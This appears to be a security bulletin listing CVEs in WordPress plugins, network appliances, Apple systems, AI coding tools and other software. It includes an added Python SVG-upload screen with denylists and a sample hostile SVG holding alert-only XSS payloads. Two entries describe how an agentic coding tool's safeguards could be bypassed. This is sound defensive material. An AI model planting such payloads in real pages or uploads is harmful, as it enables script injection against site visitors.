| wpfanyi--WPSite Shortcode | The WPSite Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'format' shortcode attribute in the wpsite_y shortcode and the 'before' attribute in the wpsite_postauthor shortcode in all versions up to, and including, 1.2. This is due to insufficient input sanitization and output escaping in error messages. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11803 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0d9712c2-1698-4c67-a700-a4598cb25a95?source=cve https://plugins.trac.wordpress.org/browser/wpsite-shortcode/tags/1.2/shortcodes/wpsite-date.php#L19 https://plugins.trac.wordpress.org/browser/wpsite-shortcode/tags/1.2/shortcodes/wpsite-date.php#L35 https://plugins.trac.wordpress.org/browser/wpsite-shortcode/tags/1.2/shortcodes/wpsite-date.php#L51   |
| wproyal--Royal Addons for Elementor Addons and Templates Kit for Elementor | The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via $item['field_id'] in all versions up to, and including, 1.7.1036 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-19 | 6.4 | CVE-2025-6251 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ead108c4-ac09-42ea-95c5-e95dc514f1cb?source=cve https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/form-builder/widgets/wpr-form-builder.php#L4023   |
| wpswings--Return Refund and Exchange For WooCommerce | The Return Refund and Exchange For WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.5.5 via the wps_rma_fetch_order_msgs() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read other users' order messages. | 2025-11-21 | 5.4 | CVE-2025-12881 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9c159237-1a3a-4d42-9a2e-fbd6ca98f38e?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394215%40woo-refund-and-exchange-lite&new=3394215%40woo-refund-and-exchange-lite&sfp_email=&sfph_mail=   |
| wpswings--Return Refund and Exchange For WooCommerce | The Return Refund and Exchange For WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.5.5 via the 'wps_rma_cancel_return_request' AJAX endpoint due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete other users' refund requests. | 2025-11-21 | 4.3 | CVE-2025-12086 | https://www.wordfence.com/threat-intel/vulnerabilities/id/126e2b92-322e-440c-a924-1b604330f164?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394215%40woo-refund-and-exchange-lite&new=3394215%40woo-refund-and-exchange-lite&sfp_email=&sfph_mail=   |
| wpwax--Directorist: AI-Powered Business Directory Plugin with Classified Ads Listings | The Directorist: AI-Powered Business Directory Plugin with Classified Ads Listings plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'directorist_prepare_listings_export_file' and 'directorist_type_slug_change' AJAX actions in all versions up to, and including, 8.5.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export listing details and change the directorist slug. | 2025-11-19 | 6.5 | CVE-2025-12174 | https://www.wordfence.com/threat-intel/vulnerabilities/id/796c0ded-3a23-4dd6-968a-a8e60bd8ea0e?source=cve https://plugins.trac.wordpress.org/changeset/3394856/directorist/tags/8.5.3/includes/classes/class-ajax-handler.php   |
| wwwlike--vlife | A security vulnerability has been detected in wwwlike vlife up to 2.0.1. This issue affects the function create of the file vlife-base/src/main/java/cn/wwwlike/sys/api/SysFileApi.java of the component VLifeApi. Such manipulation of the argument fileName leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-11-17 | 5.3 | CVE-2025-13266 | VDB-332601 \| wwwlike vlife VLifeApi SysFileApi.java create path traversal VDB-332601 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #689436 \| vlife 2.0.1 Arbitrary File Read https://github.com/wwwlike/vlife/issues/3   |
| xwikisas--application-admintools | XWiki AdminTools integrates administrative tools for managing a running XWiki instance. Prior to version 1.1, users without admin rights have access to AdminTools.SpammedPages. View rights are not restricted only to admin users for AdminTools.SpammedPages. While no data is visible to non admin users, the page is still accessible. This issue has been patched in version 1.1. A workaround involves setting the view rights for the AdminTools space to be only available for the XWikiAdminGroup. | 2025-11-18 | 5.3 | CVE-2025-54990 | https://github.com/xwikisas/application-admintools/security/advisories/GHSA-v7r8-8p5c-h4xw   |
| xwikisas--xwiki-pro-macros | XWiki Remote Macros provides XWiki rendering macros that are useful when migrating content from Confluence. Prior to version 1.27.0, a user with no view rights on a page may see the content of an office attachment displayed with the view file macro. This issue has been patched in version 1.27.0. | 2025-11-19 | 6.8 | CVE-2025-65089 | https://github.com/xwikisas/xwiki-pro-macros/security/advisories/GHSA-8c52-x9w7-vc95   |
| yithemes--YITH WooCommerce Wishlist | The YITH WooCommerce Wishlist plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.10.0 via the REST API endpoint and AJAX handler due to missing validation on user-controlled keys. This makes it possible for unauthenticated attackers to discover any user's wishlist token ID, and subsequently rename the victim's wishlist without authorization (integrity impact). This can be exploited to target multi-user stores for defacement, social engineering attacks, mass tampering, and profiling at scale. | 2025-11-19 | 5.3 | CVE-2025-12427 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ffdb95ac-6b22-44a9-bd5c-b802a2d908d7?source=cve https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L56 https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L97 https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-ajax-handler.php#L38 https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-ajax-handler.php#L265 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394933%40yith-woocommerce-wishlist%2Ftrunk&old=3379519%40yith-woocommerce-wishlist%2Ftrunk&sfp_email=&sfph_mail=#file0   |
| yithemes--YITH WooCommerce Wishlist | The YITH WooCommerce Wishlist plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.10.0. This is due to the plugin not properly verifying that a user is authorized to perform actions on the REST API /wp-json/yith/wishlist/v1/lists endpoint (which uses permission_callback => '__return_true') and the AJAX delete_item handler (which only checks nonce validity without verifying object-level authorization). This makes it possible for unauthenticated attackers to disclose wishlist tokens for any user and subsequently delete wishlist items by chaining the REST API authorization bypass with the exposed delete_item nonce on shared wishlist pages and the AJAX handler's missing object-level authorization check. | 2025-11-19 | 5.3 | CVE-2025-12777 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0088a97c-5a06-4500-a923-242499596aca?source=cve https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L56 https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L96 https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-frontend.php#L740 https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-ajax-handler.php#L222 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394933%40yith-woocommerce-wishlist%2Ftrunk&old=3379519%40yith-woocommerce-wishlist%2Ftrunk&sfp_email=&sfph_mail=#file0   |
| zhengdon-- | The 简数采集器 plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.6.3 via the __kds_flag functionality that imports featured images. This makes it possible for authenticated attackers, with Administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2025-11-21 | 4.9 | CVE-2025-11973 | https://www.wordfence.com/threat-intel/vulnerabilities/id/66dc2ca2-c61c-4c73-aa2a-0017299cbca5?source=cve https://wordpress.org/plugins/keydatas/   |
| Zyxel--DX3301-T0 firmware | An uncontrolled resource consumption vulnerability in the web server of Zyxel DX3301-T0 firmware version 5.50(ABVY.6.3)C0 and earlier could allow an attacker to perform Slowloris-style denial-of-service (DoS) attacks. Such attacks may temporarily block legitimate HTTP requests and partially disrupt access to the web management interface, while other networking services remain unaffected. | 2025-11-18 | 5.3 | CVE-2025-6599 | https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-uncontrolled-resource-consumption-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-11-18-2025   |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Campcodes--Complete Online Beauty Parlor Management System | A vulnerability was identified in Campcodes Complete Online Beauty Parlor Management System 1.0. This vulnerability affects unknown code of the file /admin/customer-list.php. The manipulation of the argument Name leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2025-11-20 | 2.4 | CVE-2025-13484 | VDB-333084 \| Campcodes Complete Online Beauty Parlor Management System customer-list.php cross site scripting VDB-333084 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #696054 \| Campcodes Complete Online Beauty Parlor Management System V1.0 Cross Site Scripting https://github.com/Abxery/cveee/issues/8 https://www.campcodes.com/   |
| Campcodes--Retro Basketball Shoes Online Store | A vulnerability was determined in Campcodes Retro Basketball Shoes Online Store 1.0. Affected by this issue is some unknown functionality of the file /admin/admin_running.php. Executing manipulation of the argument product_name can lead to cross site scripting. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2025-11-19 | 2.4 | CVE-2025-13412 | VDB-332939 \| Campcodes Retro Basketball Shoes Online Store admin_running.php cross site scripting VDB-332939 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #693698 \| campcodes Retro Basketball Shoes Online Store V1.0 cross site scripting https://github.com/laosijivul/cve/issues/1 https://www.campcodes.com/   |
| Canva--Canva | The Mac App Store distribution of the Canva for Mac desktop app before 1.117.1 was built without Hardened Runtime. A local threat actor with unprivileged access could execute arbitrary code that inherits the TCC (Transparency, Consent, and Control) permissions assigned to Canva. | 2025-11-18 | 3.2 | CVE-2025-12792 | https://trust.canva.com/?tcuUid=1e77a34b-f586-450b-b30d-b6e17d15b443   |
| Fortinet--FortiADC | An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiADC 7.4.0, FortiADC 7.2 all versions, FortiADC 7.1 all versions, FortiADC 7.0 all versions, FortiADC 6.2 all versions may allow an admin with read-only permission to get the external resources password via the logs of the product. | 2025-11-18 | 3.9 | CVE-2025-54971 | https://fortiguard.fortinet.com/psirt/FG-IR-25-686   |
| Fortinet--FortiMail | An improper neutralization of CRLF sequences ('CRLF injection') in Fortinet FortiMail 7.6.0 through 7.6.3, FortiMail 7.4.0 through 7.4.5, FortiMail 7.2 all versions, FortiMail 7.0 all versions may allow an attacker to inject headers in the response via convincing a user to click on a specifically crafted link. | 2025-11-18 | 3.9 | CVE-2025-54972 | https://fortiguard.fortinet.com/psirt/FG-IR-25-634   |
| Fortinet--FortiPAM | A Cleartext Storage of Sensitive Information in Memory vulnerability [CWE-316] in Fortinet FortiPAM 1.6.0, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions may allow an authenticated attacker with read-write admin privileges to the CLI to obtain other administrators' credentials via diagnose commands. | 2025-11-18 | 3.8 | CVE-2025-61713 | https://fortiguard.fortinet.com/psirt/FG-IR-25-789   |
| Fortinet--FortiProxy | An Improper Privilege Management vulnerability [CWE-269] in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4 all versions, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiPAM 1.6.0, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions may allow an authenticated administrator to bypass the trusted host policy via crafted CLI command. | 2025-11-18 | 1.8 | CVE-2025-54821 | https://fortiguard.fortinet.com/psirt/FG-IR-25-545   |
| Gallagher--T21 Reader | Missing Release of Resource after Effective Lifetime (CWE-772) in the T21 Reader allows an attacker with physical access to the Reader to perform a denial-of-service attack against that specific reader, preventing cardholders from badging for entry. This issue affects Command Centre Server: 9.30 prior to vCR9.30.251028a (distributed in 9.30.2881 (MR3)), 9.20 prior to vCR9.20.251028a (distributed in 9.20.3265 (MR5)), 9.10 prior to vCR9.10.251028a (distributed in 9.10.4135 (MR8)), and all versions of 9.00 and prior. | 2025-11-18 | 2.4 | CVE-2025-64734 | https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-64734   |
| HCL Software--Connections | HCL Connections is vulnerable to a sensitive information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper rendering of application data. | 2025-11-18 | 3.5 | CVE-2025-52639 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124241   |
| icret--EasyImages | A vulnerability was identified in icret EasyImages up to 2.8.6. This affects an unknown part of the file /app/upload.php of the component SVG Image Handler. The manipulation of the argument File leads to cross site scripting. It is possible to initiate the attack remotely. | 2025-11-19 | 3.5 | CVE-2025-13415 | VDB-332940 | icret EasyImages SVG Image upload.php cross site scripting VDB-332940 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #693732 | GitHub EasyImages2.0 <=V2.8.6 Improper Neutralization of Alternate XSS Syntax https://github.com/icret/EasyImages2.0/issues/260   |
| jarun--nnn | A double free in jarun nnn up to 5.1 affects the functions show_content_in_floating_window and run_cmd_as_plugin in the file nnn/src/nnn.c. The attack must be carried out locally. The fix is commit 2f07ccdf21e705377862e5f9dfa31e1694979ac7; installing the patch is recommended. | 2025-11-23 | 3.3 | CVE-2025-13566 | VDB-333330; jarun nnn nnn.c run_cmd_as_plugin double free VDB-333330; CTI Indicators (IOB, IOC, IOA) Submit #698113; nnn v5.1 Double Free https://github.com/jarun/nnn/issues/2091#issue-3635886658 https://github.com/jarun/nnn/issues/2091#issuecomment-3547591759 https://github.com/jarun/nnn/commit/2f07ccdf21e705377862e5f9dfa31e1694979ac7 |
| librenms--librenms | LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Prior to version 25.11.0, a weak password policy vulnerability was identified in the user management functionality of the LibreNMS application. This vulnerability allows administrators to create accounts with extremely weak and predictable passwords, such as 12345678. This exposes the platform to brute-force and credential stuffing attacks. This issue has been patched in version 25.11.0. | 2025-11-18 | 3.7 | CVE-2025-65014 | https://github.com/librenms/librenms/security/advisories/GHSA-5mrf-j8v6-f45g   |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.3, 10.5.x <= 10.5.11 fail to enforce access permissions on the Agents plugin, which allows other users to determine when users had read channels via channel member objects. | 2025-11-18 | 3 | CVE-2025-55074 | https://mattermost.com/security-updates |
| Medical Informatics Engineering--Enterprise Health | Medical Informatics Engineering Enterprise Health has a stored cross site scripting vulnerability that allows an authenticated attacker to add arbitrary content in the 'Demographic Information' page. This content will be rendered and executed when a victim accesses it. This issue is fixed as of 2025-03-14. | 2025-11-20 | 3.5 | CVE-2025-35029 |  |
| n/a--mrubyc | A NULL pointer dereference in mrubyc up to 3.4 affects the function mrbc_raw_realloc in the file src/alloc.c via manipulation of the argument ptr. The attack must be carried out locally. The fix is commit 009111904807b8567262036bf45297c3da8f1c87; applying the patch is recommended. | 2025-11-19 | 3.3 | CVE-2025-13397 | VDB-332925; mrubyc alloc.c mrbc_raw_realloc null pointer dereference VDB-332925; CTI Indicators (IOB, IOC, IOA) Submit #692130; mrubyc 3.4 NULL Pointer Dereference https://github.com/mrubyc/mrubyc/issues/244 https://github.com/mrubyc/mrubyc/issues/244#issuecomment-3400382026 https://github.com/mrubyc/mrubyc/commit/009111904807b8567262036bf45297c3da8f1c87 |
| OpenPrinting--cups-filters | cups-filters contains backends, filters, and other software required to get the CUPS printing service working on operating systems other than macOS. In versions 2.0.1 and prior, a heap-buffer-overflow vulnerability in the rastertopclx filter causes the program to crash with a segmentation fault when processing maliciously crafted input data. This issue can be exploited to trigger memory corruption, potentially leading to arbitrary code execution. This issue has been patched via commit 956283c. | 2025-11-20 | 3.3 | CVE-2025-64524 | https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-rq44-2q5p-x3hv https://github.com/OpenPrinting/cups-filters/commit/956283c74a34ae924266a2a63f8e5f529a1abd06 |
| Public Knowledge Project--omp | A cross-site scripting vulnerability in Public Knowledge Project omp and ojs 3.3.0/3.4.0/3.5.0 affects the file plugins/paymethod/manual/templates/paymentForm.tpl (Payment Instructions Setting Handler component) via manipulation of the argument manualInstructions. The attack can be initiated remotely. Upgrading the affected component is recommended. | 2025-11-20 | 2.4 | CVE-2025-13469 | VDB-333042; Public Knowledge Project omp/ojs Payment Instructions Setting paymentForm.tpl cross site scripting VDB-333042; CTI Indicators (IOB, IOC, TTP, IOA) Submit #695020; Public Knowledge Project Open Journal System 3.5.0-1 Cross Site Scripting https://github.com/pkp/pkp-lib/issues/12022 https://github.com/pkp/pkp-lib/issues/12022#event-20904087480 https://github.com/pkp/pkp-lib/issues/12022#event-20904112770 |
| SourceCodester--Interview Management System | A cross-site scripting vulnerability in SourceCodester Interview Management System 1.0 affects the file /editQuestion.php via manipulation of the argument Question. The attack can be launched remotely. A public exploit is available. | 2025-11-18 | 3.5 | CVE-2025-13343 | VDB-332761; SourceCodester Interview Management System editQuestion.php cross site scripting VDB-332761; CTI Indicators (IOB, IOC, TTP, IOA) Submit #691936; SourceCodester Interview Management System V1.0 Improper Neutralization of Alternate XSS Syntax https://github.com/puppytgyh/-CVE/issues/11 https://www.sourcecodester.com/ |
| SourceCodester--Online Shop Project | A cross-site scripting vulnerability in SourceCodester Online Shop Project 1.0 affects the file /shop/register.php via manipulation of the argument f_name. The attack can be initiated remotely. A public exploit is available. | 2025-11-20 | 3.5 | CVE-2025-13450 | VDB-333020; SourceCodester Online Shop Project register.php cross site scripting VDB-333020; CTI Indicators (IOB, IOC, TTP, IOA) Submit #694780; SourceCodester Online Shop Project V1.0 Cross Site Scripting https://github.com/xiaojuzirr/cve/issues/5 https://www.sourcecodester.com/ |
| SourceCodester--Student Grades Management System | A cross-site scripting vulnerability in SourceCodester Student Grades Management System 1.0 affects the file /grades.php (Add New Grade page) via manipulation of the argument Remarks. The attack can be initiated remotely. A public exploit is available. | 2025-11-18 | 3.5 | CVE-2025-13349 | VDB-332766; SourceCodester Student Grades Management System Add New Grade grades.php cross site scripting VDB-332766; CTI Indicators (IOB, IOC, TTP, IOA) Submit #692065; SourceCodester Student Grades Management System 1.0 Cross Site Scripting https://medium.com/@ankitkaushal43731/title-student-grades-management-system-stored-xss-authenticated-in-grades-php-remarks-field-d9625243df06 https://www.sourcecodester.com/ |
| Tinexta Infocert--GoSign Desktop | GoSign Desktop through 2.4.1 disables TLS certificate validation when configured to use a proxy server. This can be problematic if the GoSign Desktop user selects an arbitrary proxy server without consideration of whether outbound HTTPS connections from the proxy server to Internet servers succeed even for untrusted or invalid server certificates. In this scenario (which is outside of the product's design objectives), integrity protection could be bypassed. In typical cases of a proxy server for outbound HTTPS traffic from an enterprise, those connections would not succeed. (Admittedly, the usual expectation is that a client application is configured to trust an enterprise CA and does not set SSL_VERIFY_NONE.) Also, it is of course unsafe to place ~/.gosign in the home directory of an untrusted user and then have other users execute downloaded files. | 2025-11-17 | 3.2 | CVE-2025-65083 | https://www.firma.infocert.it/prodotti/gosign https://securityaffairs.com/184672/hacking/multiple-vulnerabilities-in-gosign-desktop-lead-to-remote-code-execution.html   |
| withastro--astro | Astro is a web framework. Prior to version 5.14.3, a vulnerability has been identified in the Astro framework's development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system. This issue has been patched in version 5.14.3. | 2025-11-19 | 3.5 | CVE-2025-64757 | https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7   |
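
The EasyImages row above (CVE-2025-13415) describes cross-site scripting reached through the SVG Image Handler of upload.php. SVG is the recurring trap behind this class of bug: an SVG is an XML document, so an upload handler that only checks the extension or MIME type will store and later serve markup carrying `<script>` elements, `on*` event handlers, `javascript:` hrefs, or embedded HTML inside `<foreignObject>`, all of which execute in the origin that serves the file. The block below is an added example, not code from EasyImages or from any vendor in this table; it shows a parser-based pre-storage check that rejects such content. The element and attribute denylists, the function names and the two sample files are constructed for this illustration and are not taken from the CVE record.

```python
"""Parser-based screening of SVG uploads for script-bearing content.

Added example; not code from EasyImages or any product in this bulletin.
The denylists below are illustrative choices, not taken from the CVE record.
"""
import re
import xml.etree.ElementTree as ET

# Elements (local name, lowercase) that can run script or embed HTML.
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}

# URL schemes that must never appear in href / xlink:href values.
BAD_SCHEME_RE = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)

# CSS constructs that load remote content or (in old engines) run script.
BAD_CSS_RE = re.compile(r"url\s*\(|expression\s*\(|@import", re.IGNORECASE)


def _local(qname: str) -> str:
    """'{http://www.w3.org/2000/svg}script' -> 'script'; plain names pass through."""
    return qname.rsplit("}", 1)[-1]


def svg_findings(data: bytes) -> list[str]:
    """Return the reasons an SVG should be rejected; an empty list means clean.

    The XML parser decodes character references (e.g. &#106;avascript:) before
    attribute values reach us, so the scheme check runs on the decoded text.
    Note: xml.etree is not hardened against entity-expansion DoS; a real upload
    handler should parse with defusedxml or reject any DOCTYPE.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings: list[str] = []
    if _local(root.tag).lower() != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")

    for el in root.iter():  # depth-first over the root and every descendant
        tag = _local(el.tag)
        if tag.lower() in FORBIDDEN_ELEMENTS:
            findings.append(f"forbidden element <{tag}>")
        if tag.lower() == "style" and el.text and BAD_CSS_RE.search(el.text):
            findings.append("<style> with external reference")
        for attr, value in el.attrib.items():
            name = _local(attr).lower()  # xlink:href and href both become 'href'
            if name.startswith("on"):
                findings.append(f"event handler {name}= on <{tag}>")
            elif name == "href" and BAD_SCHEME_RE.match(value):
                findings.append(f"href= with script/data scheme on <{tag}>")
            elif name == "style" and BAD_CSS_RE.search(value):
                findings.append(f"style= with external reference on <{tag}>")
    return findings


def is_safe_svg(data: bytes) -> bool:
    """Upload-handler gate: store or serve the file only if this returns True."""
    return not svg_findings(data)


# Constructed samples for demonstration (not taken from any real upload).
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <rect width="10" height="10" fill="#08c"/>
</svg>"""

HOSTILE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.domain)">
  <script>alert(1)</script>
  <a xlink:href="&#106;avascript:alert(2)"><text y="10">click</text></a>
  <foreignObject width="10" height="10">
    <body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(3)"/></body>
  </foreignObject>
</svg>"""

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_SVG), ("hostile", HOSTILE_SVG)):
        print(label, "->", svg_findings(blob) or "clean")
```

A denylist like this is a screen, not a proof: serving user SVGs with `Content-Disposition: attachment` from a separate origin, or rasterizing them server-side, removes the script-execution vector even when the screen misses a case.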

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 7-Zip--7-Zip | 7-Zip ZIP File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this product is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the handling of symbolic links in ZIP files. Crafted data in a ZIP file can cause the process to traverse to unintended directories. An attacker can leverage this vulnerability to execute code in the context of a service account. Was ZDI-CAN-26753. | 2025-11-19 | not yet calculated | CVE-2025-11001 | ZDI-25-949   |
| AMD--AMD Ryzen 9000HX Series Processors | Improper handling of insufficient entropy in the AMD CPUs could allow a local attacker to influence the values returned by the RDSEED instruction, potentially resulting in the consumption of insufficiently random values. | 2025-11-21 | not yet calculated | CVE-2025-62626 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-7055.html   |
| AMD--Kria SOM | The security state of the processor calling into Arm® Trusted Firmware (TF-A) is not used, which could allow non-secure processors to access secure memories, perform crypto operations, and turn subsystems within the SoC on and off. | 2025-11-23 | not yet calculated | CVE-2025-48507 | https://www.amd.com/en/resources/product-security/bulletin/amd-sb-8017.html |
| AMD--Versal Adaptive SoC Devices | The Secure Flag passed to the Versal™ Adaptive SoC's Arm® Trusted Firmware for Cortex®-A processors (TF-A) for Arm Power State Coordination Interface (PSCI) commands was incorrectly set to secure instead of reflecting the processor's actual security state. This allows PSCI requests to appear to come from processors in the secure state rather than the non-secure state. | 2025-11-23 | not yet calculated | CVE-2025-54515 | https://www.amd.com/en/resources/product-security/bulletin/amd-sb-8020.html |
| anthropics--claude-code | Claude Code is an agentic coding tool. Prior to version 2.0.31, due to an error in sed command parsing, it was possible to bypass the Claude Code read-only validation and write to arbitrary files on the host system. This issue has been patched in version 2.0.31. | 2025-11-21 | not yet calculated | CVE-2025-64755 | https://github.com/anthropics/claude-code/security/advisories/GHSA-7mv8-j34q-vp7q   |
| anthropics--claude-code | Claude Code is an agentic coding tool. Prior to version 1.0.39, when running on a machine with Yarn 3.0 or above, Claude Code could have been tricked to execute code contained in a project via yarn plugins before the user accepted the startup trust dialog. Exploiting this would have required a user to start Claude Code in an untrusted directory and to be using Yarn 3.0 or above. This issue has been patched in version 1.0.39. | 2025-11-19 | not yet calculated | CVE-2025-65099 | https://github.com/anthropics/claude-code/security/advisories/GHSA-5hhx-v7f6-x7gv   |
| Apache Software Foundation--Apache Causeway | Apache Causeway faces Java deserialization vulnerabilities that allow remote code execution (RCE) through user-controllable URL parameters. These vulnerabilities affect all applications using Causeway's ViewModel functionality and can be exploited by authenticated attackers to execute arbitrary code with application privileges. This issue affects all current versions. Users are recommended to upgrade to version 3.5.0, which fixes the issue. | 2025-11-19 | not yet calculated | CVE-2025-64408 | https://lists.apache.org/thread/rjlg4spqhmgy1xgq9wq5h2tfnq4pm70b |
| Apple--iPadOS | The issue was addressed with improved checks. This issue is fixed in iPadOS 17.7.7, iOS 18.5 and iPadOS 18.5. An attacker with physical access to a device may be able to override managed Wi-Fi profiles. | 2025-11-21 | not yet calculated | CVE-2025-31216 | https://support.apple.com/en-us/122405 https://support.apple.com/en-us/122404   |
| Apple--macOS | A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Ventura 13.7.3, macOS Sequoia 15.5, macOS Sonoma 14.7.3. An app may be able to access sensitive user data. | 2025-11-21 | not yet calculated | CVE-2025-31248 | https://support.apple.com/en-us/122069 https://support.apple.com/en-us/122716 https://support.apple.com/en-us/122070   |
| Apple--macOS | A spoofing issue was addressed with improved truncation when displaying the fully qualified domain name. This issue is fixed in Safari 18.5, macOS Sequoia 15.5. A website may be able to spoof the domain name in the title of a pop-up window. | 2025-11-21 | not yet calculated | CVE-2025-31266 | https://support.apple.com/en-us/122716 https://support.apple.com/en-us/122719 |
| Apple--macOS | An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iPadOS 17.7.7, iOS 18.5 and iPadOS 18.5, visionOS 2.5, macOS Sonoma 14.7.3, macOS Ventura 13.7.3, macOS Sequoia 15.5, watchOS 11.5. An attacker in physical proximity may be able to cause an out-of-bounds read in kernel memory. | 2025-11-21 | not yet calculated | CVE-2025-43374 | https://support.apple.com/en-us/122069 https://support.apple.com/en-us/122716 https://support.apple.com/en-us/122405 https://support.apple.com/en-us/122404 https://support.apple.com/en-us/122721 https://support.apple.com/en-us/122722 https://support.apple.com/en-us/122070   |
| ASUSTOR--ABP and AES | When the service of ABP and AES is installed in a directory writable by non-administrative users, an attacker can replace or plant a DLL with the same name as one loaded by the service. Upon service restart, the malicious DLL is loaded and executed under the LocalSystem account, resulting in unauthorized code execution with elevated privileges. This issue affects ABP and AES: from ABP 2.0 through 2.0.7.9050, from AES 1.0 through 1.0.6.8290. | 2025-11-19 | not yet calculated | CVE-2025-13051 | https://www.asustor.com/security/security_advisory_detail?id=48   |
